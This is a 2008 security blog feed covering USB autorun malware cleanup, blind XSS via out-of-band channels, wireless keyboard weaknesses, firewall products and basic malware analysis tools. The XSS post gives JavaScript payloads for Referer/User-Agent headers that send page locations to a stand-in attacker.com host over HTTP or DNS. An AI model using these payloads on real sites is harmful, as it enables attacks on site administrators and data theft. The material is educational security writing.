H-Security Labs - Makale category

USB Diskler ve Güvenlik Problemleri

Mon, 26 May 2008 22:15:54 GMT

Son zamanlarda USB Disklerin fiyatlarının iyice ucuzlaması ve pratik kullanımları sebebiyle kullanım oranları çok fazla arttı. Bilgisayardan bilgisayara dolaşan USB diskler virüsleri de beraberlerinde bilgisayardan bilgisayara taşıdılar. Yani virüsler için yeni bir hızlı ve pratik yayılma metodu oluştu.

Makale Hakkında

Yazı başlangıç ve orta seviye kullanıcıya hitap ediyor.
Çevremden sıkça gelen sorular sebebiyle kaleme almayı düşündüm.
Yazı çok iyi bölümlenmedi ve çok fazla konu bütünlüğü yok fakat en basit ve sık görülen saldırılardan başlayıp, komplike aksiyonlara doğru sürükleniyor.
Makaleyi bloga taşımam biraz garip oldu ve bazı tasarım problemleri var.

Yazar : Mesut Timur
Tarih : Mayıs 2008
E-Mail : mesut@h-labs.org
Site:http://www.h-labs.org

Peki Nasıl Bulaşıyor?

Bilgisayarınıza USB Bellek taktıktan sonra, "Bilgisayarım" menüsünden USB Bellek ikonuna çift tıkladığınızda, ya da sağ tıklayıp "Otomatik Kullan" yaptığınızda autorun özelliği gereği belleğin root dizinindeki çalıştırılabilir dosya çalışır. Bu çalıştırabilir dosya zararlı bir dosya ise, enfekte olabilirsiniz.

AutoRun & Auto-Play Ne Ola ki?

Auto-Run dediğimiz hadise, bir CD/DVD/USB Bellek taktığınızda onunla beraber bir yardımcı yazılım ( örneğin kurulum programı) başlaması olayıdır. Auto-Play ise Auto-Run aktif olduğu zaman çalışan yazılımdır.

Bu noktada kavram kargaşası yaratmak istemiyorum; o açıdan örneklerle açıklamak gerekirse sağ tarafta gördüğünüz ekran klasik Auto-Play menüsüdür.Aygıtınızın Auto-Run özelliği kapalıysa, bu ekranı görmesiniz.

Windows XP ile beraber USB Disklerden Auto-Run özelliğinin otomatik başlaması olayı kaldırılmıştır, ancak sizin elle "Otomatik Kullan" seçeneğini seçmeniz ya da , "Bilgisayarım" menüsünden USB Bellek ikonuna çift tıklamanız durumunda çalışır.

Temel olarak ilgili aletinin (CD/DVD/USB Bellek) kök dizinindeki autorun.inf dosyasında çalıştırılacak dosyanın yolu, gösterilecek ikon gibi bilgiler bulunur. Bu bilgiler ışığında yukarıda anlattığım "Otomatik Kullan" olayı gerçekleşir.

Farkındalık

İşin ilginç tarafı, son kullanıcılar USB Bellekleriyle birlikte virüs taşıdıklarının genel olarak farkında değiller ve anti-virüs yüklü bir bilgisayara enfekte olmuş bir alet takıldığında anti-virüsün uyarı vermesi sonucu insanlar arasında "Benim bilgisayarıma virüs bulaştırmak istiyorsun" şeklinde başlayan ufak çaplı tartışmalar yaşanabiliyor. Haricinde yine aynı durumda USB Bellek sahibi "Bilgisayarından virüs bulaştı" şeklinde sizi suçlayabilir.

Nasıl Korunacağız?

Açıkçası öyle ahım, şahım extra güvenlik aksiyonlarına girmenize gerek yok. Hiçbir aygıtın Auto-Run özelliğini kullanmayın. Sadece kullanacağınız USB Belleğin ilgili harddisk bölümüne sağ tıklayıp "Araştır / Explore" seçeneği ile açarsanız, bu tip zararlılardan korunmuş olursunuz.

Nasıl Temizleyeceğiz?

Korunma kısmı gayet basit, ama yanlışlıkla da olsa , reflekslerimiz saolsun, gidip o ikonun üzerine çift tıklayabiliyoruz. Temizlemek için öncelikli olarak yapılması gereken kendi enfekte olmuş bilgisayarımızı temizlemektir.Bu noktada anti-virüs programınızın etkisiz kalması durumunda yapılacak şey; her virüse özel olarak farklı gerçekleştirilmesi gereken bir yöntem gerektirir. Bu konudaki benim genel metodolojim şu şekilde (ezberden yazıyorum):

Aktif durumdaki güvenlik yazılımı inaktif hale getirilir.
O anki çalışan process'ler kontrol edilir, garip bir şey bulunursa :
1. Çalışan dosyanın yolu bir kenara not edilir
2. Kullandığı TCP/IP bağlantıları,vs incelenir.
3. Process kapatılmaya çalışılır, davranışları incelenir (kapanıyor mu,tekrar açılıyor mu)
4. Semptomları tespit edilmeye çalışılır (örneğin geçen gün bilgisayarıma bulaşan virüs gizli dosyaları gösterme seçeneğini hep aktif halde tutuyordu)
İşletim sisteminin ilk başladığında çalışan uygulamalar kontrol edilir. (msconfig,startup,vs)
Kıllanılan processler bir klasorde toplanır ve online virüs tarama servislerinden kontrol edilir. Emin olun virüsün ilk bulaştığı makine sizinki değil.
Online tarama servislerinden sağlanılan bilgiler vasıtasıyla ilgili fix internetten aranır, bulunur ve uygulanır.
2.Maddenin d şıkkında elde edilen etkilerin hala varolup olmadığı kontrol edilir.

Tüm bunlara şunu eklemek gerekir ki; bir kere enfekte olmuş bir makineyi temizlemeye çalışmak çok da akıl karı bir yol değildir. Nitekim bilgisayarınızın %100 temizlendiğine hiçbir zaman emin olamazsınız.

Daha Özel Bir Durum Üzerine

USB Disklere dönelim. USB Diskler sayesinde yayılan virüslerin genel özellikleri:

Genellikle gizli ve sistem dosyalarıdır; explorer ile açtığınızda göremezsiniz.
Autorun.inf içindeki bilgiler vasıtasıyla bulaşırlar.

Elinizde temiz bir sistem var, ve enfekte olmuş bir USB Diski bilgisayarınıza taktığınızı düşünelim. Bu durumda yapacağımız şey belli, Autorun.inf'yi ve ilgili executable dosyayı silmek olacak. Adım adım incelemek gerekirse :

USB Belleği takın
Hiçbir otomatik başlat aksiyonuna girmeyin.
Command Prompt'u açın (Başlat> Çalıştır > "cmd" ve enter)
USB Bellek için ayrılan partitiona girin ( Benim örneğimde I: )
Attrib uygulaması vasıtasıyla, USB belleğinizin kök dizinindeki dosyaların özelliklerini inceleyin. Varsayımımızda dikkat ettiyseniz, virüslerin genellikle sistem ve gizli dosya olarak kendilerini niteleyeceklerini ve autorun.inf sayesinde bulaşacaklarını söylemiştik. Burada da hem bu özellikler, hem de isim itibariyle, virüslü dosyalar çok net şekilde belli olmaktadır. (SHR, Sırasıyla; System, Hidden,Read-Only özelliklerini simgelemekte)

attrib –s –h –r m.exe

attrib –s –h –r autorun.inf

attrib –s –h –r gjatw9aj.exe

Bu komutları çalıştırdıktan sonra, bu şüpheli dosyaların sistem dosyası olma, gizli dosya olma ve read-only dosya olma özelliklerini ellerinizden aldığımız için artık Explorer ile görünebilir ve silinebilir hale gelecektir.
Şüpheli dosyalardan kesin olarak emin olmak için, online zararlı program tarama servislerinden faydalanabiliriz. (Bu tarama servislerinin bulunduğu listeyi yazının sonunda bulabilirsiniz.) Örneğin ben m.exe'yi http://virusscan.jotti.org/ adresinden tarattım. Oradaki rapora göre anti-virüslerin büyük çoğunluğuna göre INFECTED/MALWARE statüsünde.

İlgili dosyalar silinir, bu işlem Explorer penceresinden, ya da Command Prompt'tan :

del m.exe

del autorun.inf

del gjatw9aj.exe

Komutlarıyla silinebilir.

Auto-Run Saldırıları ve Enteresan Bir Virüsün Anatomisi

Dediğimiz gibi, Auto-Run saldırılarının asıl etkili olduğu yer şu an itibariyle CD-ROM'lar. Çünkü Windows sistemlerde şu an itibariyle default ayar, takılan CD-ROM'daki kurulum programının otomatik olarak çalışması. Yani o program yerine CD-ROM'a yazılan bir virüs, hiçbir kullanıcı etkileşimi gerekmeksizin bilgisayarınıza bulaşabilir.

Bu fikri temel alan bir gelişmiş virüsler de mevcut. Fikre göre, bilgisayarına bulaşan virüs, bilgisayarınızdaki tüm CD imajlarına ( ISO imajları, ISO9660 formatı) bulaşarak kendisini her CD yazılma işlemi sonucu başka bir bilgisayara taşıyor. Bir bakıma bilmeden suça ortak ediyor sizi[1]

U3 Teknolojisi ve Güvenlik Riskleri

U3 Teknolojisinden genel itibariyle bahsetmek isterse; USB işletim sistemlerine benzer bir fikirle, kısaca yanında taşımak istediğiniz yazılımlarınızı teknolojinin desteklediği tüm işletim sistemlerinde çalıştırabilmenizi sağlar. Yani atıyorum okulunuzdaki bilgisayarınızda mp3 dinlemek istiyorsunuz ve bir mp3 player bile yüklememişler. Yönetimsel kısıtlamalar gereği makinede admin olarak çalışmıyorsanız, böyle bir yazılım yükleme imkanınız da yok. Bu durumda yanınızda taşıdığınız U3 destekli USB bellek sayesinde istediğiniz(daha önceden bellek üzere kurduğunuz) programları USB belleğiniz üzerinden çalıştırabilirsiniz. Belleğinizi bilgisayardan çektikten sonra host makinede hiçbir iziniz kalmıyor. [2]

U3 Teknolojisi Windows XP ve sonraki sistemlerde varolan USB Bellek'lerin autorun özelliklerinin devre dışı bırakılması durumunu by-pass etmiş. USB Bellek takıldığı anda sisteme 2 adet aygıt ekleniyor, bir tane read-only sanal bir CD sürücü ve FAT dosya sistemine sahip bir standart flash disk. Tahmin ettiğiniz üzere autorun özelliğinin devre dışı kaldığı yer flash disk tarafı, ve sanal CD-ROM tarafında böyle bir kısıtlama söz konusu değil. Yani CD-ROM'a bir virüs yazabilirseniz, her autorun özelliği kapatılmamış bilgisayara takıldığında, o bilgisayarı enfekte edebileceğiniz anlamına geliyor.

İşte zurnanın tam olarak zırt dediği yer burası, zira ilk bakışta sanal Read-Only CD-ROM'a bir şey yazmak imkansız gibi dursa da, bu dediğimiz kadar imkansız değil ve firmware'in update utility'si, Read-Only CD-ROM'daki programı update ediyor. Yani bu noktada bir tasarım problemi var ve update programı oradaki autorun programını değiştirebiliyorsa, herhangi bir virüs ya da kod da yapabilir demektir.[3] Uzun lafın kısası, kendini autorun programı yerine koyabilen bir virüs çok daha hızlı şekilde yayılabilir ve bunu yapmak, referanslardan ilgili adresleri okursanız göreceksiniz gayet kolay (ekleyeyim, kendim denemedim). [4]

İleri Seviye Tehditler

USB Dumping

Bu teknik genel olarak, USB Belleği bir bilgisayara taktığınızda, o bellekteki bilgilerin sessiz sedasız takılan bilgisayara aktarılmasıdır. USB 2.0 standartının sağladığı veri transfer hızı da fena değilken, "sunum alayım diyerek, tüm verileri çalmak" zevkli bir aktivite olsa gerek. Aslında bu atağın en önemli yönü, kolay şekilde gerçekleşmesi. Arka planda çalıştığını bile fark etmediğiniz bir process resmen saman altından su yürütüyor!

Haricinde, fikir biraz daha geliştirilerek dosyaların e-maillenmesi, ya da belli bir ftp hesabına yüklenmesi gibi şeyler de yapılmış. Tüm verinin başka bir kanal aracılığıyla aktarılması çok da etkili görünmese de, public bir bilgisayarda çalışan yazılım kopyaladığı tüm dosyaların elinize geçmesi fikri çok etkileyici duruyor.[5]

Bu tekniğin implemente edildiği "USBDumper" isimli yazılımın demonstre edildiği videoya şu adresten ulaşılabilir.

PodSlurping Saldırıları

Buradaki olay USB Dumping olayının tersidir. Yani bilgisayara taktılan USB bellekteki kötü niyetli yazılım, bilgisayarın bilgilerini USB belleğe kopyalar. Ama bu atak tipi ilki kadar kolay değildir, zira gerçekleşmesi için kötü niyetli yazılımın bilgisayarınızda çalışması gerekir ve bu da daha çok autorun özelliği ve biraz da sosyal mühendislik yapılarak başarılmaya çalışılır.[6]

Haricinde sadece USB bellekten değil de, ağ üzerinden de bağlanıp aynı işi yapmak da bu terim çerçevesinde ele alınır.

Güvenlik Önerileri

Tekrarlıyorum, anti-virüs kullanın. Gelecek saldırıların en az %50 sinden korunuyor olacaksınız.
Tüm aletlerin(CD-ROM, Flash Bellek) auto-run özelliklerini devre dışı hale getirin.
Hiçbir aletin auto-play özelliğini kullanmayın.
USB Şifreleme çözümleri kullanılabilir.
USB Portlarını engellemek çok mantıklı bir güvenlik politikası değil , fakat sınırlama getirilebilir. Kullanıcı bazlı olarak hangi tip aletlerin , hangi bilgisayarlara takılabileceği gibi kısıtlamalar etkili olabilir. İmplementasyon detayları ile ilgili çok fazla fikrim yok fakat referanslar bölümünde ilgili ürünler hakkında bilgi bulunabilecek kaynakları ve makaleleri gösterdim.[7]

Referanslar

[1] Infecting ISO CD Images , Z0MBiE,29A Vol 6
[2] U3 - Wikipedia
[3] U3 Teknolojisi Kullanan USB Belleklerdeki Tehlike , Zemana Blog
[4] Hacking U3 USB drives , McGrew Security
[5] USB Hacksaw , USB Hacks
[6] How to: Simple "Podslurping" Example With a USB Flash Drive , USB Hacks
[7]
- The Infectious Allure of Vendor Swag, Technet 2008 January
- http://www.devicelock.com/dl/
- http://www.devicewall.com/

Online Tarama Servisleri

VirusTotal - Free Online Virus and Malware Scan

Jotti's malware scan

Virus.Org :: Malware Scanning Service

VirSCAN.org - The Multi-Engine Virus Scanner

Antivirus online virus scan - viruschief.com

Filterbit

Birden fazla tarama motoru kullanan bildiğim servisler bunlar. Siz de bildiklerinizi commentlere eklerseniz, dökümana eklenecektir.

Teşekkürler

Yorum, eleştiri ve değerlendirmeleri için Dite'a teşekkür ederim.

OoB Channel XSS Testing

Mon, 24 Mar 2008 02:15:41 GMT

Out-of-Band attacks are widely known and have been using for exploiting SQL Injection vulnerabilities. The main point is making a HTTP/DNS/etc request with containing sensitive data to the server that has been controlling by the attacker via the vulnerable channel.

Basic Info

When we need OoB Channels to check XSS?

For SQL Injection attacks, they can be very useful for totally-blind SQL Injections. Because there isn’t any error message or any kind of difference at output.

Also If we don’t have permission to see the XSS vulnerable script, it can be classified as blind XSS vulnerability.

Many of blog / portal softwares stores some portions of HTTP header such as HTTP_REFERER ,USER_AGENT and HTTP_X_FORWARDED_FOR for informational purposes.Also they show these information from their administrative panels.

The Problem

From an attacker’s perspective, there is a big problem if no input sanitization were made because these sections of HTTP header can be manipulated and also can be used for attack purposes such as:

1) SQL Injection :This can occur at storing these data to the database server.

2) XSS : This can occur when administrator looks for Referers or User-Agent statistics.

In this situtation, SQL Injection may be realized but XSS can’t be tested because, only administrator can see the working of attack. So, basic XSS testing method- “<script>alert(1)</script>” - can not be used to test this kind of XSS vulnerabilities.

This attack will be very critical because XSS attack will be performed against the administrator.

Exploiting Phase

To perform the attack, you must fill the HTTP_REFERER and USER-AGENT with the attack payload and wait for HTTP/DNS/etc requests.

HTTP-channel javascript payload	i=new image(); i.src=’http://www.attacker.com/xss.php?data=’+windows.location.href;
DNS-channel javascript payload	var i = new Image(); var x = location.href; i.src = "http://" + x.substr(7, x.length-8) +".attacker.com/";

Sure that advanced payloads can be developed with many filter bypassing abilities and etc.The one thing must be done is to wait for administrators to check his site’s referrers or user-agents.

Thanks & Credits

Thanks Bedirhan Urgun for DNS-channel javascript payload.

Kablosuz İletişimdeki Güvenlik Problemleri

Tue, 05 Feb 2008 16:34:35 GMT

Giriş ve Basit Tanımlar

Kablosuz teknolojiler şüphesiz ki kablo kirliliğini engellediği için hepimizce kullanılmak istenen ve basitçe elektrik sinyallerin transferi sırasında kablo gibi kapalı bir ortamın kullanılması yerine hava üzerinden iletişim sağlanmasına dayalı teknolojiler bütünüdür.

Kullanım alanları ise çok geniştir :

802.11 Kablosuz networkler
Kablosuz klavye,fare ve diğer ekipmanlar
Mobil iletişim teknolojileri ve telekomünikasyon sistemleri

Çok bilimsel bir kategorizasyon olmadı zaten amacım da bu değil sadece kullanım alanlarının çokluğunu gösterip güvenlik problemlerine değinmek.

GÜVENLİK SORUNLARI

Temel sorun, verinin kablo gibi kapalı bir ortamda değil de herkesin erişebileceği bir ortamda hareket etmesi. Yani aslında evinizdeki wireless yönlendiricinizin sinyalleri (beacon) odanız duvarlarından dışarı çıkmasa fiziksel güvenliğinizi sağladığınız an dışardaki bir insanın evinizdeki kablosuz modemden haberi bile olmaz.Ama gelin görün ki öğle arasında şirket kafeteryasından e-maillerini kontrol etmek isteyen bir çalışanınız evden getirdiği wireless router'ı switchinizin bir portuna bağlar ve binlerce dolar harcayıp kurduğunuz firewal sistemlerinizi bir anda geçilebilir (bypassable) kılar. Portunuz halka açılmıştır ve muhtemelen ethernet teknolojisinin tasarım probleminden kaynaklanan Man-In-The-Middle yemenize saniyeler vardır.
Evet veri kablo yerine açık bir ortam üzerinden akacağı için ister istemez insanların erişimini kesemeyiz, peki bu durumda iletişim güvenliğini nasıl sağlayacağız? Temel olarak bir güvenli iletişim modeli kendi bünyesinde aşağıdaki problemleri çözmüş olması gerekir :

Kimlik Doğrulama
- Kablosuz ağımıza sadece yetkisi olan insanların bağlanabilmesi
Şifreleme
- Madem havadaki verilere herkesin erişimini kesemiyoruz, o zaman anlaşılmasını engelleyebiliriz!
Bütünlük Kontrolü
- Veri paketlerinin hiçbir değişikliğe uğramadan yolculuğunu tamamlaması

Hatırlayacak olursanız güzide fiyaskomuz WEP bu konuda tam bir rezillik örneğiydi ve onun yazılımsal modifikasyonu WPA gelip durumu toparlamıştı. Bu güvenlik modelinde şüphesiz ki her katman önemlidir fakat esas problem bence verilerin şifrelenmesi ve bilgilerin gizliliğin sağlanmasıdır. Yine WEP'ten örnek vermek gerekirse, WEP keyi bilmeden kimlik doğrulama aşamasını başarıyla geçseniz bile kablosuz ağı kullanarak iletişim gerçekleştirmeniz(mesela internete girmek) mümkün değil,çünkü şifrelenmiş paketleri açamaz ve iletişimi devam ettiremezsiniz.

Haricinde WLAN'ları bir kenara bırakırsak kablosuz klavyelerdeki güvenlik problemleri ile ilgili geçen ay bir makale + video çıktı ki eminim çoğunuz olayı duymuşssunuzdur. Gerçi orada sadece encryption aşamasının kırılması gösteriliyordu, Black Hat 2007 de yapılan sunumu gördüyseniz çok daha fazlası mümkün. Neyse oradaki ataklardan bahsetmek gerekirse; öncelikli olarak 27 mhz frekansında çalışan kablosuz klavyelerdeki şifreleme mekanızması şu şekilde gerçekleşiyor. Öncelikli olarak authentication-assocation(kimlik doğrulama - ilişkilendirilme) sırasında bir random byte oluşturuluyor ve tüm veri paketleri bu byte ile XOR'lanıp yollanıyor. Evet tüm şifreleme mekanizması bu ve sizin de bildiğiniz gibi 1 byte demek, 8 bit demek!

1 byte = 8 bit;
8 bit --> 2^8 = 256 farklı ihtimal.

Yani bir klavye vuruşunu decrypt etmek istiyorsanız, 256 farklı ihtimalini denemeniz gerekir ve bu zaten bugünün bilgisayarları için komik bir sayı. Netekim keyi bulduktan sonra tüm klavye vuruşlarını görebilir ve yan masadaki arkadaşımızın parolalarını araklayabiliriz.Extra ve daha verimli bir exploiting için, kablosuz klavye kullanan bilgisayarda aktif şekilde kod çalıştırabiliriz çünkü biliyorsunuz ki klavyelerde Windows tuşu olarak geçen tuş ve R'ye basarak Run/Çalıştır penceresini açabiliriz, oradan command line'a düşülür ve gerisi kişinin fantezi yeteneğine bağlı olarak değişir. Artık trojan download edip kendinize backdoor mu açarsınız, sisteme yeni bir kullanıcı mı eklemek istersiniz size kalmış.

Diğer bir kablosuz ağ kullanım alanı ise, ülkemizde de kullanılan kablosuz POS makineleri. Açıkçası teknik alt yapılarını, iletişim sırasında kullandıkları şifreleme mekanizması vs bilgileri bilmiyorum. Bu konudaki yasal düzenlemeleri de bilmiyorum ama bu bilgilerin gizliliği ve şifrelemesi ile ilgili ayarları yapmakla mükellef bulunan iş yeri sahiplerinin kişisel keyiflerine bırakılmasını (bırakılmışssa?) yanlış buluyorum. Zaten bu makineleri kullanırken kullanılan cihazın modifiye edilmesi, PIN girerken meraklı gözlere hedef olmak, vb tehditler zaten mevcut ve bu kadar sağlıksızken bir de kablosuz iletişiminin güvenli yapıldığı fikri bana çok da mantıklı gelmiyor

Referanslar

Kablosuz Ağlara Saldırı ve Defans, Ferruh Mavituna

WEP'in Zayıflıkları

27 Mhz Keyboard Insecurities, DreamLabs

Other Wireless: New Ways to be Pwned, Luis Miras, Black-Hat USA 2007

Juniper Networks Netscreen SSG-X 3

Fri, 28 Dec 2007 14:03:36 GMT

Merhaba,bir Juniper Netscreen yazımızda daha tekrar beraberiz.Hatırlayacağınız üzere bundan önceki yazılarımızda Netscreen'e genel bakış yapmıştık,neler yapabileceğimizi ve neler yapamayacağımızı öğrenmiştik,temel ayarlarmızı yapıp daha sonra da PPP üzerinden bağlantı sağlayıp internet çıkışımızı gerçekleştirmiştik.

Bu zamana kadar yaptığımız çalışmalar aslına bakarsanız güvenlik ile ilgili birşey içermiyordu.Fakat bu ve bundan sonra ki yazılarımızın içeriği tamamiyle güvenlik yapıları olacaktır.Sanırım birçok kişininde beklediği yazılar(beklediğinizi pek düşünmüyorum aslında :P ) bu ve bundan sonrakiler olacaktır.Bu zamana kadar yaptığımız konfigurasyon herhangi bir network cihazını konfigure etmekten farklı değildi aslında.

Temel Düzeyde Malware Analizi / Araçları

Tue, 25 Dec 2007 00:26:13 GMT

1.Ön Bilgi
2.Hakkında
3.Statik Analiz
4.Dinamik Analiz
      4.1.Registry İncelemesi
      4.2.Dosya Aktiviteleri
      4.3 Network Aktiviteleri
      4.4 Process Analizi
5.Makale Sonu


1.Ön Bilgi
Bu yazımızda, temel düzeyde dinamik malware analizinin nasıl yapılabileceğinden bahsedeceğiz, ilgili araçları tanıtacağız.
Genel olarak, malware analizi dinamik ve statik olmak üzere iki şekilde yapılır.Statik analiz ile kasıt, yazılımın çalıştırılmadan, "dead listing" denilen reverse engineering yöntemleriyle ,yani programin dissassembly çıktısı olsun, resource hacker vb. programlar aracılığı ile içinde gömülü olan şeyleri araştırma gibi yöntemlerdir.
Bizim bu yazıda daha çok bahsedeceğimiz ise dinamik analiz olacak, yani program aktifken yaptığı işleri kontrol ederek "malware" olup olmadığına karar vereceğiz ya da ne yaptığını detaylı olarak inceleyebileceğiz. Haricinde "debugging" de bir dinamik analiz metodudur. Fakat yazıda reverse engineering yöntemlerine değinilmeyeceği için makale incelenmeyecektir.

Aslında her ne kadar bizim yapacağımız nacizane analizler yerine, anti-virus, firewall , spyware vb çözümler kullanarak genellikle bu tür malware'leri tespit edebilecek olsanız da, genel olarak malware'lerin nasıl çalıştığını merak eden, ne gibi karakteristik özellikleri olduğunu öğrenmek isteyen, ve şüphelendiği dosyayı az-çok kurcalamak isteyen insanlar için faydalı olacaktır.

2.Hakkında
Yazar : Mesut TİMUR (mesut@h-labs.org)
Konular/Keywordler : malware ,trojan , virus, zararlı program tespiti
Seviye : Orta Düzey(Son Kullanıcı)
Tarih : 25 Aralık 2007

3.Statik Analiz
Genel olarak, değerlendirmelerin çalıştırılmayan, yani şüphelenilen uygulamanın durgun hali üzerine yapılan analizlerdir. Temel konseptleri için :
Executable dosya içerisinde geçen stringleri incelemek, çalışması için gerekli dll dosyalarını, derlendiği platform ve yazıldığı dili kavramak ,disassembly yani makine kodunu alıp biraz daha okunabilir hal olan ilgili işlemcinin assembler koduna çevirme, yapılabiliyorsa decompilation, packlenmişse unpacking vb işlemleri kapsayan başlıktır.Kod obfuscation ya da encryption gibi yöntemler çokça kullanılır ve analiz sürecini geciktirir/engeller.
Zaman zaman amatör malware'leri analiz ederken statik analizde çokça yararlı bilgi edinilebilmektedir. 1-2 yıl kadar önce "sms programı" adı altında dağıtılan bir keyloggerın yaptığı kayıtları yolladığı bir php scriptini, ve adresini bu yöntemle çok rahat tespit edebilmiştim.İşin komik yanı, keylogger'ı yazan arkadaş kendi nickiyle açtığı bir sub-domain'e kayıtları yönlendirmesiydi.
Haricinde belki de statik analizde en faydalı olan şeylerden biri, ilgili malware ile ilgili olarak nette araştırma yapmak.

Örneğin foundstone'un BinText isimli yazılımı bu işi başarıyla yapmakta.Verilen binary dosya içerisindeki ASCII text, Unicode ve Resource stringleri döndürebiliyor.
Örnekte ve tabii ki resimden de görülebileceği üzere, browse butonu ile kendisini gösterip Go'ya tıkladığımda programın hemen her yerinde geçen stringleri döndürdü, resimde ise sadece help'teki bilgilerin olduğu yeri gösterdim.

4.Dinamik Analiz
Kısacası malware'imiz çalışırken yapılan analizlerdir.Malware'in çalıştığı ortama etkisi, ortam değişkenlerine bağlı davranışları vs incelenir. Malware'in aktif olarak çalışacağı için, sisteminize zarar verme riskine karşı mantıklı olan VMware üzerinde bu işlemi gerçekleştirmektir.Dinamik analizin esas olayı, malware'in nasıl çalıştığından daha çok tam olarak ne yaptığıdır.
Dinamik analiz genel olarak 4 farklı koldan gerçekleştirilebilir.
4.1.Registry İncelemesi : Malware'in, registry'e yazdığı bilgilerin aynı zamanda bir text dosyasına kayıt edilmesi, belli filtera göre kayıt edilmesi ve sakladığı bilgilerin ortaya çıkmasıyla birlikte belli bir miktar bilgi sahibi olmak. Bu iş için biçilmiş kaftan tabii ki yıllardır bilinen/kullanılan RegMon'dur.
Regmon Gerçek zamanlı olarak hangi executable dosyanın hangi registry key'ine ulaştığını, o key ile ilgili ne gibi bir işlem yaptığını (açmak, kapamak, okumak, yazmak) , işlem sonucunu gösterebilmektedir.
Malware'ler ise, daha sonra kullanmak istedikleri bazı bilgileri saklamak ya da windowsun yeniden açıldığında tekrar aktif hale gelmesi için otomatik olarak çağırılması ile ilgili ayarlamalar yapıyor olabilir. Onun için şüpheli binary dosyanın registry işlemleri kesinlikle incelenmelidir.
Regmonun çalışma mantığı temel olarak hafızaya bir device driver yükleyip, registry ile ilgili servislere giden çağrıları hook etmek, yani çağrılar ile servis arasında girip gelip-giden istekleri görebilmektedir.

4.2 Dosya Aktiviteleri : Yine aynı şekilde malware'lar, dosyalarda önemli veriler tutuyor ya da bazı kontrolleri dosyaları sayesinde gerçekleştiriyor olabilirler. Bundan dolayı onların dosyalarla olan aktivitelerini incelemek bize çok faydalı bilgiler sağlayabilir.
Bu iş için de, yine SysInternals'in bir yazılımı olan FileMon kullanılabilir.FileMon da RegMon gibi hangi processin hangi dosya ile işlem yaptığını, ne gibi bir işlem yaptığını vb aktiviteleri monitor etmekte oldukça başarılı.

4.3 Network Aktiviteleri : Hangi portların açık olduğunu, hangi process'in hangi porttan iletişim yaptığını, hangi ip ile iletişimde olduğunu merak edebilir ve hatta bu iletişimin içeriğinin ne olduğunu bilmek isteyebilirsiniz. Bu durumda, yine SysInternals'ten TCPView yazılımını tavsiye edeceğim. Yalnız aynı zamanda trafiğin içeriğini merak ediyorsanız, sisteminize bir sniffer kurmanız gerekecek ve bu sefer da nacizane tavsiyem Wireshark olacak.
Network aktivitelerinin incelenmesi,malware analizinin belki de en kilit noktalarından biridir ki şüpheli bir dosyanın trojan olup olmadığını bu şekilde anlayabilirsiniz.
4.4 Process Analizi
Bu yazıyı yazma sebebim olan konu başlığına geldik.Şüpheli bir dosyanın kullandığı kaynaklar , yukarıda saydığımız tüm aktivitelerini birden izleme, process threadleri hakkında bilgi, performans ve ilgili graphleri görebilme, processlerin priority(öncelik)leriyle oynayabilme, process'i kapatabilme, çalışan process'in tam yolu ve bir dolu daha özellik.

Process Explorer, tüm bu saydıklarımı yapabiliyor.
Haricinde, dinamik analiz için iDefense Labs'in Malcode Analysis Pack'i de kullanabilir. Haricinde malware analizi için sayfalarında detaylı bilgi bulunabilir.

Genel olarak, dinamik analizin temel konseptleri ve ilgili araçlar da bunlar.
Tüm bu araçlar tanıtıktan sonra klasik malware analiz metodolojisi :

Kontrollü bir ortam sağlanması
Bilgi Toplama
Statik ve Dinamik Analiz
Bilgilerin derlenmesi ve yorum

5.Makale Sonu

Her ne kadar farklı şeyler anlatmak istesem de araç tanıtımının dışına pek çıkamadım bu yazıda, şimdilik bu kadar makalenin alacağı ilgi ve tepkiye göre devamı niteliğinde bir şeyler yazarız. Şiddetle yorum ve yönlendirmelerinizi bekliyorum.

Astaro Security Gateway

Mon, 17 Dec 2007 10:54:56 GMT

Aslında gerekli kurulum klavuz ve detaylı inceleme belgesini hazırlamak için bir süre önce to-do list'e ekledim fakat listeye sonradan eklenmesinden dolayı bu makaleler bir süre gecikecektir.Bu zaman boyunca siz güvenlik ve network uzmanlarımızı bu ürün ailesinden mahrum etmemek adına biraz olsun tanıtmak istedim.Astaro 2000 senesinde bulunmuş ve UTM(Unified Threat Management) mantığını yaratmış olan Almanya kaynaklı firmadır.İlk başlarda karşımıza Appliance olarak çıkan Astaro ürünleri içinde koşan yazılımın Unix tabanlı olmasından dolayı daha sonra yazılım olarakta dağıtılmaya başlandı,bu sayede donanım bağımsız olarak istediğimiz makinaya kurabildik.Son 1-2 senedir ise Astaro çok popüler olan Virtualization akımına ayak uydurarak Security Gateway yazılımını VMWare imajı olarak kullanıma açtı.Gün geçtikçe her yeni versiyonda yeni birşeyler katan Astaro Security Gateway'in şu anda yazılımsal olarak son versiyonu 7.1 mevcut.

Astaro bize donanımsal olarak Network ölçeklerinize göre tam 6 adet model sunmakta.Yazılımsal olarak hem Appliance modellerinin tümünde,hem soft olarak dağıtılan versiyonunda hemde Virtual imaj versiyonunda aynı paket kullanıldığından dolayı tüm ürünler sadece donanımsal olarak farklılık göstermekte.Donanımsal ürün ailemizi aşağıdaki karşılaştırma tablosunda daha net ayırt edebiliriz.

Şekilde de görüldüğü üzere ailemizin en küçük ürünü ASG110/120 ve en büyük ürünü ASG525F.Kendimi şanslı hissediyorum ki ülkemizde az bilinen bu kaliteli ürünün ASG320 modelinden birkaç sene önce takım arkadaşım Mesut TİMUR ile belkide ülkemizdeki ilk kurulumu gerçekleştirmiştik.Bu yakışıklı ve dizayn harikası ürünün biraz daha büyümüş versiyonunu aşağıdaki resimde görebilirsiniz.

Karşılaştırma tablosunda dikkat ettiyseniz modeller arasında değişen farklılıklar donanım ve donanım performansları üzerine,kimisinde network interface sayısı artmışken buna orantılı Firewall Throughput ve VPN Throughput sayıları artmış,belirli bir modelden sonra 10/100/1000mbps ethernet interface'leri gelmiş ve daha ileriki modellerde Fiber portlar eklenmiş.Ayrıca tabloda gözükmeyen ancak değişen bazı donanımsal özelliklerde mevcut,bunlar memory,işlemci ve hardiskler.İşlemci sayıları ve hızları artıyor,memoryler yükseliyor ve disk sayıları artıp bazı raid teknolojileri sunuluyor.

Evet,bu zamana kadar ki bütün bu yazılar ile markayı ve ürün ailesini biraz tanıdık.Şimdi de biraz asıl olarak ilgileneceğimiz güvenlik kısmına gelelim.

Astaro Security Gateway yukarıda da bahsettiğim gibi UTM teknolojisinin mucidi sayılabilir.UTM kapsamında tek noktadan güvenlik ile ilgili tüm işlemlerinizi halletmeniz gerekir.

Astaro üzerinde bu kapsamda güvenlik olarak şu başlıkları bulabilirsiniz;

